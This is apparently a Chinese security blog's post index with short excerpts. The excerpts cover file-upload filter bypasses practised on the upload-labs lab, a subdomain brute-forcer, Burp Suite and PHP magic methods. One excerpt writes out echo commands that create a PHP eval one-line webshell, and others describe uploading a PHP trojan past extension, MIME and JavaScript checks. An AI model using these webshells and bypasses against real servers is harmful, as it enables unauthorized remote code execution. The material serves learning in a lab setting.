iZero

2023年5月15日

摘要：前言在 PHP 中，以双下划线__开始命名的方法被称作 PHP 中的魔术方法，它们在 PHP 中充当很重要的角色。常见的魔术方法有： __construct()：构造函数 __destruct()：析构函数 __get(): 访问不存在的成员变量时调用 __set()：设置不存在的成员变量时调用阅读全文

posted @ 2023-05-15 17:59 iZero 阅读(13) 评论(0) 推荐(0) 编辑

2020年10月4日

文件上传漏洞之过滤敏感文件扩展名

摘要：双写绕过：把filename.php修改为filename.pphphp 过滤掉php后就会变成filename.php 阅读全文

posted @ 2020-10-04 16:32 iZero 阅读(617) 评论(0) 推荐(0) 编辑

文件上传漏洞之黑名单验证

摘要： pass-03 只禁止了部分扩展名，还有.php5等扩展名可以解析为PHP。上传.php5即可。类似的扩展名有：php2，php3、php4、php5、phtml、等阅读全文

posted @ 2020-10-04 12:23 iZero 阅读(527) 评论(0) 推荐(0) 编辑

文件上传漏洞之MIME类型过滤

摘要：上传的时候修改Content-Type为image/jpeg等程序指定的类型即可。修改为：使用蚁剑连接测试阅读全文

posted @ 2020-10-04 12:20 iZero 阅读(629) 评论(0) 推荐(0) 编辑

2020年10月2日

命令执行写马的正确方式

摘要： Windows 错误写马正确姿势 echo ^<?php @eval($_POST[cmd]);?^> > ./iii.txt Linux 正确写马方式 echo "<?php @eval(\$_POST['cmd']); ?>" > ./1.php 阅读全文

posted @ 2020-10-02 08:10 iZero 阅读(1474) 评论(0) 推荐(1) 编辑

无状态子域名爆破工具：ksubdomain

摘要：概述开源地址：https://github.com/knownsec/ksubdomain 二进制文件下载：https://github.com/knownsec/ksubdomain/releases 在linux下，还需要安装libpcap-dev,在Windows下需要安装WinPcap，m 阅读全文

posted @ 2020-10-02 08:06 iZero 阅读(1561) 评论(0) 推荐(0) 编辑

2020年3月3日

burpsuite中文乱码问题

摘要： burpsuite中文乱码问题,无法匹配中文阅读全文

posted @ 2020-03-03 06:00 iZero 阅读(9563) 评论(0) 推荐(0) 编辑

2020年3月2日

文件上传漏洞之js验证

摘要： 0x00 前言只有前端验证=没有验证 0x01 剔除JS 打开burpsuite，进入Proxy的Options，把Remove all JavaScript选上。设置浏览器代理直接上传PHP木马即可。 0x02 上传截断修改扩展名把PHP木马修改为jpg格式，然后上传，用burpsuite截阅读全文

posted @ 2020-03-02 22:54 iZero 阅读(648) 评论(0) 推荐(0) 编辑

文件上传漏洞靶机upload-labs(1到10)

摘要： upload-labs,上传漏洞,一句话木马阅读全文

posted @ 2020-03-02 22:52 iZero 阅读(1212) 评论(0) 推荐(0) 编辑

2019年10月31日

URI/URL/URN都是什么

摘要： URI : Uniform Resource Identifier,统一资源标志符 URL : Universal Resource Locator,统一资源定位符 URN : Universal Resource Name,统一资源名称比如：，是无痕安全团队的网站图标链接，它是一个URL，也是阅读全文

posted @ 2019-10-31 11:13 iZero 阅读(411) 评论(0) 推荐(0) 编辑

公告